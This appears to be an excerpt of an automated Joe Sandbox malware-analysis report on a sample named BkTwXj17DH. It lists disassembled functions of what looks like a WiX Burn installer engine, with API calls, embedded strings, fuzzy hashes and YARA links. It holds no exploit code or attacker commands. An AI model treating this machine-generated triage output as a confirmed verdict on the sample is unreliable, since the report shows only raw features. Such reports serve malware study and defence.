Instruction ID: e5948a3d19291f303f4a6241533f11400c6b2ecf7a328c98e962e8fe71c40619
Opcode Fuzzy Hash: 698b12539fb3b162617e6e18e7ee84e0ad4c28ae210acfef92fea63d17846d08
Instruction Fuzzy Hash: AC61E63BD00229ABDF619ED58844F9FBB64AB04756F15819EEE00BB250E7399F0087D8

Function 004CCBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,004C53BD,00000000,004C5489,004C5445,WixBundleUILevel,840F01E8,?,00000001), ref: 004CCC1C

Strings

Failed to ensure directory exists, xrefs: 004CCCEE
Failed to get directory portion of local file path, xrefs: 004CCCF5
Failed to concat file paths., xrefs: 004CCCFC
Failed to extract file., xrefs: 004CCCE7
payload.cpp, xrefs: 004CCD1D
Payload was not found in container: %ls, xrefs: 004CCD29
Failed to find embedded payload: %ls, xrefs: 004CCC48
Failed to get next stream., xrefs: 004CCD03

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareString
String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
API String ID: 1825529933-1711239286
Opcode ID: 47d5fcca2d7abe724b6b3f14edbe1d5c836f2c92ab6709c16d6bd1a00fd7acd4
Instruction ID: 79ff2714d0db224b454230bfb27125aca46788a75495f7d9085735a11ffdca1b
Opcode Fuzzy Hash: 47d5fcca2d7abe724b6b3f14edbe1d5c836f2c92ab6709c16d6bd1a00fd7acd4
Instruction Fuzzy Hash: 1841DF39900215EBCFA59F44CDC1FAEBBA5BF00710B10816FE80AAB391D7789D41DB99

Function 004C4796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 004C47BB
GetCurrentThreadId.KERNEL32 ref: 004C47C1
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004C484F

Strings

Unexpected return value from message pump., xrefs: 004C48A5
engine.cpp, xrefs: 004C489B
wininet.dll, xrefs: 004C47EE
Failed to load UX., xrefs: 004C4804
Failed to create engine for UX., xrefs: 004C47DB
Failed to start bootstrapper application., xrefs: 004C481D

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
API String ID: 673430819-2573580774
Opcode ID: f01e22b70a5776f0ef3a68e6ccabf97e0614af8307994c6c696bec09c3223507
Instruction ID: 7508655ed81d88df852e06efd6e753f93f9a57629df934b6e37c34febc26a3c8
Opcode Fuzzy Hash: f01e22b70a5776f0ef3a68e6ccabf97e0614af8307994c6c696bec09c3223507
Instruction Fuzzy Hash: 8A41B279A00555BFEB50ABA0CC95FBEB76CFF44314F10012EF905E7280DB28AD0587A9

Function 004E9C84 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 128COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,004EB03E,?,00000001,00000000), ref: 004E9D0F
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,004EB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 004E9D19
CopyFileExW.KERNEL32(00000000,00000000,004E9B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 004E9D67
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,004EB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 004E9D96

Strings

apply.cpp, xrefs: 004E9D3D, 004E9D81, 004E9DBA
Failed to clear readonly bit on payload destination path: %ls, xrefs: 004E9D48
BA aborted copy of payload from: '%ls' to: %ls., xrefs: 004E9D8F
Failed attempt to copy payload from: '%ls' to: %ls., xrefs: 004E9DC8
copy, xrefs: 004E9CDD

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLast$AttributesCopy
String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
API String ID: 1969131206-836986073
Opcode ID: 35a3deeba1ac22ab1b80c74e83417ad3ccc8d42da80bbdc25a3aaf555528363c
Instruction ID: e32f7532ab33c7118834ac32fbcc4375e3331343d4b3cad30d77bedf53b11784
Opcode Fuzzy Hash: 35a3deeba1ac22ab1b80c74e83417ad3ccc8d42da80bbdc25a3aaf555528363c
Instruction Fuzzy Hash: 35312A72A41162B7EB209A53CC46EAB7B68BF41B12B14411ABC04EB3C0E328CD01C7E9

Function 004D8EBC Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 004D9007

Strings

Failed to secure cache path: %ls, xrefs: 004D8FEA
Failed to allocate access for Administrators group to path: %ls, xrefs: 004D8F0F
Failed to allocate access for Users group to path: %ls, xrefs: 004D8F72
Failed to allocate access for SYSTEM group to path: %ls, xrefs: 004D8F30
Failed to create ACL to secure cache path: %ls, xrefs: 004D8FBB
Failed to allocate access for Everyone group to path: %ls, xrefs: 004D8F51
cache.cpp, xrefs: 004D8FB0

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: FreeLocal
String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
API String ID: 2826327444-4113288589
Opcode ID: 959001b2bd170f7d6aafb6a0ca5cefab4880b51f0872d3f94019cc1252da2cca
Instruction ID: feb083d34708978540b06ab149493ec6374c7ee585214c81b92b181606a63481
Opcode Fuzzy Hash: 959001b2bd170f7d6aafb6a0ca5cefab4880b51f0872d3f94019cc1252da2cca
Instruction Fuzzy Hash: 49411832A40329B7EB3157548C55FBA7A69EB40B10F0140AFFA04BB380DF799E4487E9

Function 004D492F Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 117fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 004D495A
GetLastError.KERNEL32 ref: 004D4967
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 004D4A12
GetLastError.KERNEL32 ref: 004D4A1C

Strings

pipe.cpp, xrefs: 004D49C6, 004D49DD, 004D4A40
Failed to read data for message., xrefs: 004D4A4A
Failed to read message from pipe., xrefs: 004D49E7
Failed to allocate data for message., xrefs: 004D49D0
crypt32.dll, xrefs: 004D4956

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
API String ID: 1948546556-773887359
Opcode ID: 921ff745b2f00b82847cf864f31b45fd6f7031bfd10229591ce2cea7697b0827
Instruction ID: ecefca981ab793c2382776a6417278ce73042a572e620ccbbe25cd55a71f833f
Opcode Fuzzy Hash: 921ff745b2f00b82847cf864f31b45fd6f7031bfd10229591ce2cea7697b0827
Instruction Fuzzy Hash: 1E31DD76D80225BBDB109FA68C65BAFBA68FB44721F11816BFC40A6340D7789D40CBD8

Function 00506C29 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 114COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,7556DFD0), ref: 00506C88
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 00506CA5
SysFreeString.OLEAUT32(00000000), ref: 00506CE3
SysFreeString.OLEAUT32(00000000), ref: 00506D27

Strings

`5w, xrefs: 00506CE3, 00506D27
email, xrefs: 00506C97
name, xrefs: 00506C7A
uri, xrefs: 00506CB3

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: String$CompareFree
String ID: `5w$email$name$uri
API String ID: 3589242889-2706133310
Opcode ID: d3dd6852b359f3855363d96c533a666ed7be23be2e07d29ac612473a2d6209c6
Instruction ID: dfb701faf8dfce2ad125ec7b64101b0f97916f7dc94991469b5e57aad125aed5
Opcode Fuzzy Hash: d3dd6852b359f3855363d96c533a666ed7be23be2e07d29ac612473a2d6209c6
Instruction Fuzzy Hash: 2C414F36A01219FBDB219B94CD55FADBB79FF04721F2442A4E920BB1E0C7719E14DB50

Function 004DE2AF Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(?,00000001), ref: 004DE2E5
GetLastError.KERNEL32 ref: 004DE2F1
GetObjectW.GDI32(00000000,00000018,?), ref: 004DE338
GetCursorPos.USER32(?), ref: 004DE359
MonitorFromPoint.USER32(?,?,00000002), ref: 004DE36B
GetMonitorInfoW.USER32(00000000,?), ref: 004DE381

Strings

splashscreen.cpp, xrefs: 004DE315
(, xrefs: 004DE378
Failed to load splash screen bitmap., xrefs: 004DE31F

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
API String ID: 2342928100-598475503
Opcode ID: 8f61003154372a1c977f91dfa082ee2d5ded2dfd62a4db3ff2339c7b50a16f8c
Instruction ID: 6bd10c6011fb037eb06cbb003304d13a1432ea8a7c83296cd9406bc3291c64bd
Opcode Fuzzy Hash: 8f61003154372a1c977f91dfa082ee2d5ded2dfd62a4db3ff2339c7b50a16f8c
Instruction Fuzzy Hash: 86316175A002199FDB10DFA9D989A9EBBF4FF08710F14811AED04EB380DB74E9048BA4

Function 004D50CA Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,?,?,0050B500), ref: 004D50D3
GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 004D5171
CloseHandle.KERNEL32(00000000), ref: 004D518A

Strings

runas, xrefs: 004D5131
Failed to allocate parameters for elevated process., xrefs: 004D510C
Failed to launch elevated child process: %ls, xrefs: 004D515E
burn.elevated, xrefs: 004D50F3
-q -%ls %ls %ls %u, xrefs: 004D50F8
open, xrefs: 004D513B, 004D5149

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Process$CloseCurrentHandle
String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
API String ID: 2815245435-1352204306
Opcode ID: 108c3a315c3ad75df0b6623c497bf26c4b2cbeca4ec4a2e19338507ff078b699
Instruction ID: 47a6d32818a7f506f3bd16c75fcf97f137e173d0f9d13e8b4c1b0de081a4976d
Opcode Fuzzy Hash: 108c3a315c3ad75df0b6623c497bf26c4b2cbeca4ec4a2e19338507ff078b699
Instruction Fuzzy Hash: A52157B5D0060ABFDF11AF94C895AAEBFB8FF04350B10816AF810A2251DB759E509B94

Function 004C6882 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 004C68AC
GetProcAddress.KERNEL32(00000000), ref: 004C68B3
GetLastError.KERNEL32 ref: 004C68BD

Strings

variable.cpp, xrefs: 004C68E1
Failed to get msi.dll version info., xrefs: 004C6905
Failed to find DllGetVersion entry point in msi.dll., xrefs: 004C68EB
Failed to set variant value., xrefs: 004C6929
msi, xrefs: 004C68A3
DllGetVersion, xrefs: 004C689E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
API String ID: 4275029093-842451892
Opcode ID: df78f663940d09100e9a55533782f611d02d19dc8bc89a6f270fec81ad9c3c30
Instruction ID: 4854e9a4297e5ebe43de3cb049e399cb5e5bdbae56376f1cdd9964350739aeb1
Opcode Fuzzy Hash: df78f663940d09100e9a55533782f611d02d19dc8bc89a6f270fec81ad9c3c30
Instruction Fuzzy Hash: 9311E776A0123AB6D7206BA9CC46F7FBBA4EB04710F01411EFD00F6281D6789D0482F5

Function 004CD6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,004C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,004C548E,?), ref: 004CD6DA
GetLastError.KERNEL32(?,004C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,004C548E,?,?), ref: 004CD6E7
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 004CD71F
GetLastError.KERNEL32(?,004C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,004C548E,?,?), ref: 004CD72B

Strings

userexperience.cpp, xrefs: 004CD708, 004CD74C
BootstrapperApplicationCreate, xrefs: 004CD719
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 004CD756
Failed to load UX DLL., xrefs: 004CD712
Failed to create UX., xrefs: 004CD76F

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
API String ID: 1866314245-2276003667
Opcode ID: 26cdb6fa0bfe9c1199d94b8f97d5d605b98a42e2d0ce398e75bc6bb9603579e9
Instruction ID: 0ad206b8b81c42069beaa865fed493b12db932c5d3086d89dab7d4c64bb3bbbe
Opcode Fuzzy Hash: 26cdb6fa0bfe9c1199d94b8f97d5d605b98a42e2d0ce398e75bc6bb9603579e9
Instruction Fuzzy Hash: 4511933BA81733A7D73156955C09F1F6A946B04761F02453EFE14AB6C0DB24DC0087D8

Function 004C1175 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53libraryloadermemoryCOMMON

Download Yara Rule

APIs

HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,004C111A,cabinet.dll,00000009,?,?,00000000), ref: 004C1186
GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,004C111A,cabinet.dll,00000009,?,?,00000000), ref: 004C1191
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004C119F
GetLastError.KERNEL32(?,?,?,?,?,004C111A,cabinet.dll,00000009,?,?,00000000), ref: 004C11BA
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004C11C2
GetLastError.KERNEL32(?,?,?,?,?,004C111A,cabinet.dll,00000009,?,?,00000000), ref: 004C11D7

Strings

SetDefaultDllDirectories, xrefs: 004C1199
kernel32, xrefs: 004C118C
SetDllDirectoryW, xrefs: 004C11BC

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AddressErrorLastProc$HandleHeapInformationModule
String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
API String ID: 3104334766-1824683568
Opcode ID: 18fa13af04e85b0303b45404c49ad723581d43fcfd2f8bbcb55befa8727979da
Instruction ID: 7bcc7dfa06196c6c9f184fb1b6dd5795e66baa69efdcedeb094dfec32b4176fc
Opcode Fuzzy Hash: 18fa13af04e85b0303b45404c49ad723581d43fcfd2f8bbcb55befa8727979da
Instruction Fuzzy Hash: 6C01F535200216BBE7206FA29C89E6F7F5CFF46760B04801AFD1492251EB78DA04CBF4

Function 004DF639 Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 155COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 004DF64E
LeaveCriticalSection.KERNEL32(?), ref: 004DF7C9

Strings

Engine is active, cannot change engine state., xrefs: 004DF668
UX requested unknown container with id: %ls, xrefs: 004DF6F3
UX requested unknown payload with id: %ls, xrefs: 004DF6A3
UX did not provide container or payload id., xrefs: 004DF7B8
Failed to set download URL., xrefs: 004DF728
Failed to set download password., xrefs: 004DF777
Failed to set download user., xrefs: 004DF751
UX denied while trying to set download URL on embedded payload: %ls, xrefs: 004DF6B9

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-2615595102
Opcode ID: 511c7794927a22ab4950f2fe384e5a2a34238d606d8b6fb58662bcb6b6b95d0f
Instruction ID: 602b8b08e6a6551a13608788fe29aadbb4478e81f8d126895c1fa4e49e2565dc
Opcode Fuzzy Hash: 511c7794927a22ab4950f2fe384e5a2a34238d606d8b6fb58662bcb6b6b95d0f
Instruction Fuzzy Hash: 1741D536601612ABDB319F24C855FABB7A8BF00710F14413BF816AB390EB79DC45C799

Function 00505A5E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 00505A9B
GetLastError.KERNEL32 ref: 00505AA9
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 00505AEA
GetLastError.KERNEL32 ref: 00505AF7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00505C6A
CloseHandle.KERNEL32(?), ref: 00505C79

Strings

dlutil.cpp, xrefs: 00505ACD
GET, xrefs: 00505B9E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
String ID: GET$dlutil.cpp
API String ID: 2028584396-3303425918
Opcode ID: 636b0448bc91da3a7ec979bc616098784d35666d5623a0ed2e8462a48eb26f41
Instruction ID: eef99a82cbe42b2d18093e19912e5f6085522643ccd06642dd6c7335ef6d4162
Opcode Fuzzy Hash: 636b0448bc91da3a7ec979bc616098784d35666d5623a0ed2e8462a48eb26f41
Instruction Fuzzy Hash: 44613B72A0061AABEB21CFA4CD85BAF7FB8BF48751F150119FE15A7280E7709D409F90

Function 004D0C50 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 004D1020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,004D0C6F,?,00000000,?,00000000,00000000), ref: 004D104F

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 004D0DF3
GetLastError.KERNEL32 ref: 004D0E00

Strings

Failed to append package start action., xrefs: 004D0C95
Failed to append cache action., xrefs: 004D0D4A
Failed to append rollback cache action., xrefs: 004D0CCF
Failed to create syncpoint event., xrefs: 004D0E2E
plan.cpp, xrefs: 004D0E24
Failed to append payload cache action., xrefs: 004D0DAA

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareCreateErrorEventLastString
String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
API String ID: 801187047-2489563283
Opcode ID: f92c3479bd75f34ae95d233a955513bd6b66ad882a298c5012c818cf5499462c
Instruction ID: a253a9064f302308230a7c74119c78a0e2a086dd6e1774daccc6d60beaa7713a
Opcode Fuzzy Hash: f92c3479bd75f34ae95d233a955513bd6b66ad882a298c5012c818cf5499462c
Instruction Fuzzy Hash: 7061C075500205EFDB05DF59C8A0AAABBFAFF84314F21845BE9059B311EB35EE42DB50

Function 00506EFF Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,7556DFD0,000000FF,type,000000FF,?,7556DFD0,7556DFD0,7556DFD0), ref: 00506F55
SysFreeString.OLEAUT32(00000000), ref: 00506FA0
SysFreeString.OLEAUT32(00000000), ref: 0050701C
SysFreeString.OLEAUT32(00000000), ref: 00507068

Strings

`5w, xrefs: 00506FA0, 0050701C, 00507068
url, xrefs: 00506F68
type, xrefs: 00506F47

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

